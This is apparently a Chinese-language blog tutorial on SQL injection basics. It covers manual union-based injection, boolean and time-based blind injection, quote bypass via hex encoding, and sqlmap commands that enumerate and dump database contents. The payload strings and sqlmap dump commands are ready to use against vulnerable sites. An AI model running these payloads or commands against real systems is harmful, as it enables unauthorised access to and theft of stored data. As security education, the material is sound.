当前位置: 首页 > article >正文

SQL注入基础

普通sql注入:后台能提供有价值的错误信息,显示在页面
    手动注入
        1. 寻找sql注入点
            get注入
                ?id=xx 
                url后加'测试是否存在注入漏洞,报错则存在
            post注入
                 把参数封装在数据包中提交
                 寻找post表单:文本框,单选按钮,复选框,文件浏览,提交按钮
                 文本框内容加'测试是否存在漏洞,报错则存在
        2. 确认注入点类型(查询语句是否带'')
            数字型
                url后加 and 1=1 正常返回数据
                url后加 and 1=2 查不到数据
            字符型
                url后加 ' and 1=1# 正常返回数据
                url后加 ' and 1=2# 查不到数据
        3. 猜当前页面查询的字段总数
            order by n     逐渐加大n,直到报错
        4. 查询页面显示了哪几个字段
            url后加 and 1=2 union select 1,2,3,4,5...n
            页面中会显示相应字段出现的位置
        5. 查询当前数据库名称
            url后加 and 1=2 union select 1,2,database(),4,5...n
            3号位置显示数据库名称
        6. 查询数据库中了所有表名(mysql)
            url后加 and 1=2 union select 1,2,group_concat(table_name),4,5...n from information_schema.tables where table_schema = database()
            information_schema: mysql数据库在系统中自动创建的一个库,统计了系统中所有数据库及其数据表
        7. 查询指定表中所有字段名称
            url后加 and 1=2 union select 1,2,group_concat(column_name),4,5...n from information_schema.columns where table_name = '查询的表名'
        8. 查询指定字段的值
            url后加 and 1=2 union select 1,2,字段名,字段名,4,5...n from '表名' limit 1,1
            limit N,M : 从第 N (从0开始)条记录开始, 返回 M 条记录。

    绕过防御
        转义字符:后台可能会过滤或转义引号。把引号里的字符进行16进制的HEX转码,就无需再使用引号
        post方式:使用burpsuit抓包


    php防注入
        PDO:php data objects
盲注
    通过仅有的判断信息对表中字段进行探测
    数据库不一定是mysql,没有information_schema库
    类型
        布尔型盲注:页面可以反馈判断的对错
        延时型盲注:页面无反馈,使用sleep函数观察页面是否有延时    
    1. 寻找sql注入点
            get注入
                ?id=xx 
                url后加'测试是否存在注入漏洞,报错则存在
            post注入
                 把参数封装在数据包中提交
                 寻找post表单:文本框,单选按钮,复选框,文件浏览,提交按钮
                 文本框内容加'测试是否存在漏洞,报错则存在
    2. 确定注入点类型
        数字型
                url后加 and 1=1 正常返回数据
                url后加 and 1=2 查不到数据
        字符型
                url后加 ' and 1=1# 正常返回数据
                url后加 ' and 1=2# 查不到数据
    3. 猜数据库名的长度
        and length(database())=n  n逐渐增大
    4. 猜数据库名的单个字符
        ' and ascii(substr(database(),1,1))>97
        ' and ascii(substr(database(),1,1))<122
        通过ascii码值逐渐调整找到该字符
        注意:此substr是mysql函数,起始位置从1开始;在php中是从0开始
    5. 逐个猜出数据库名
    6. 猜该数据库有多少张表
        ' and (select count(table_name) from information_schema.tables where table_schema=database())=n
        逐渐增大n,找到表的数量
    7. 猜第一张表名的长度
        ' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1
        逐渐增大n,找到第一个表名的长度
    8. 猜第一张表,第一个字符
    9. 猜出完整表名
    10. 猜第n张表名
    11. 猜目标表的总字段数
    12. 猜字段名
    13. 猜字段值

注入工具(原理与手动注入一致)
    sqlmap注入
        get注入
            sqlmap -u 'url' --dbs    获取数据库名
            sqlmap -u 'url' -D 数据库名 --tables  获取指定数据库下的表名
            sqlmap -u 'url' -D 数据库名 -T 表名 --columns  获取指定表的字段名
            sqlmap -u 'url' -D 数据库名 -T 表名 -C 字段名,字段名 --dump  获取指定字段的值
        post注入(burpsuit开代理截取post包)
            sqlmap -r post包文件路径 --dbs  获取数据库名
            sqlmap -r post包文件路径 -D 数据库名 --tables  获取指定数据库下的表名
            sqlmap -r post包文件路径 -D 数据库名 -T 表名 --columns  获取指定表的字段名
            sqlmap -r post包文件路径 -D 数据库名 -T 表名 -C 字段名,字段名 --dump  获取指定字段的值
    啊D
    明小子旁注
    metasploit

http://www.lryc.cn/news/2386447.html

相关文章:

  • 使用 A2A Python SDK 实现 CurrencyAgent
  • qt浏览文件支持惯性
  • Python类的力量:第六篇:设计模式——Python面向对象编程的“架构蓝图”
  • [实战]用户系统-2-完善登录和校验以及VIP
  • 负载均衡笔记
  • 印度语言指令驱动的无人机导航!UAV-VLN:端到端视觉语言导航助力无人机自主飞行
  • mysql都有哪些锁?
  • 解锁未来AI:使用DACA模式和Agentic技术提高开发效率
  • HarmonyOS NEXT 使用 relationalStore 实现数据库操作
  • R语言学习--Day04--数据分析技巧
  • SRS流媒体服务器之RTC播放环境搭建
  • Android 性能优化入门(三)—— ANR 问题分析
  • 用HTML5实现实时ASCII艺术摄像头
  • 鸿蒙Flutter实战:22-混合开发详解-2-Har包模式引入
  • 游戏引擎学习第302天:使用精灵边界进行排序
  • SpringBoot+MyBatis
  • wireshark: Display Filter Reference
  • Java基础 Day19
  • VMware+Windows 11 跳过安装阶段微软账号登录
  • HarmonyOS开发-应用间跳转
  • 网工每日一练
  • 使用 Navicat 17 for PostgreSQL 时,请问哪个版本支持 PostgreSQL 的 20150623 版本?还是每个版本都支持?
  • 校园二手交易系统
  • 基于pycharm,python,flask,sklearn,orm,mysql,在线深度学习sql语句检测系统
  • LangChain02-Agent与Memory模块
  • upload-labs通关笔记-第17关文件上传之二次渲染gif格式
  • 计算机网络学习20250525
  • STM32中的SPI通信协议
  • 从版本控制到协同开发:深度解析 Git、SVN 及现代工具链
  • redis Pub/Sub 简介 -16 (PUBLISH、SUBSCRIBE、PSUBSCRIBE)